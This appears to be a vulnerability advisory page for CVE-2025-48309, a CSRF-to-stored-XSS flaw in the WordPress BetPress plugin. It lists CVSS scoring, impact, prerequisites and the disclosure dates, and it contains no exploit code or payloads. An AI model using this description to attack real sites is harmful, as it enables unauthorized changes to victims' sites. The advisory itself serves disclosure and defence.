CVE-2025-48309 HIGH

CVE-2025-48309: WordPress BetPress plugin <= 1.0.1 Lite - CSRF to Stored XSS vulnerability

Vendor Web-Able
Product BetPress
Weakness CWE-352 · CSRF
Published August 28, 2025
Last update April 28, 2026

CVSS base score

7.1/10
Attack vector Network
Attack complexity Low
Privileges required None
User interaction Required
Confidentiality Low
Integrity Low

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

What the vulnerability does

01Description

Cross-Site Request Forgery (CSRF) vulnerability in web-able BetPress betpress allows Stored XSS.This issue affects BetPress: from n/a through <= 1.0.1 Lite.

Explanation of Vulnerability in Simple Terms

02Summary

BetPress versions up to 1.0.1 Lite contain a cross-site request forgery (CSRF) vulnerability that allows attackers to perform unauthorized actions on behalf of site visitors. An attacker can craft a malicious link or page that, when visited by a logged-in user, executes unwanted requests against the site. This can lead to data modification, unauthorized changes, or other malicious actions depending on what the user is authorized to do.

What an attacker can do

03Attacker Capabilities

Perform unauthorized actions on the site by tricking a logged-in user into visiting a malicious page.

Potential impact on your site

04Site Impact

Attackers can modify site data, change settings, or perform other actions as the victim user without their knowledge.

Conditions required to exploit

05Prerequisites

A site visitor must be logged in and click a malicious link or visit an attacker-controlled page.

Key dates

06Disclosure timeline

August 28, 2025 CVE published
April 28, 2026 Record updated